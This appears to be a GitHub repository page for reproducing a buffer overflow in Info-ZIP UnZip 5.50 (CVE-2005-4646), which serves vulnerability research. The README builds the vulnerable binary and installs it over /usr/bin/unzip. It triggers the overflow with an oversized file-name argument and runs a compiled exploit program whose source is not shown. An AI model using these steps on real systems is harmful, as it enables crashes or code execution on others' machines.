Skip to content
Branch: master
Find file History
Pull request Compare This branch is 1 commit ahead, 3 commits behind mudongliang:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md
unzip-expl.c

README.md

CVE-2005-4646

Experiment Environment

CentOS 6.5

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2005-4667/unzip550.tar.gz
tar -xvf unzip550.tar.gz
cd unzip-5.50
make -f unix/Makefile
sudo cp unzip /usr/bin/unzip

Problems in Installation & Configuration

How to trigger vulnerability

Method 1

./unzip `perl -e 'print "A" x 50000'` 

Method 2

gcc -o exploit unzip-expl.c
./exploit

PoCs

Info-ZIP UnZip File Name Buffer Overflow Vulnerability

Info-ZIP UnZip 5.x - File Name Buffer Overflow

Vulnerability Details & Patch

Root Cause

Stack Trace

Patch

References

You can’t perform that action at this time.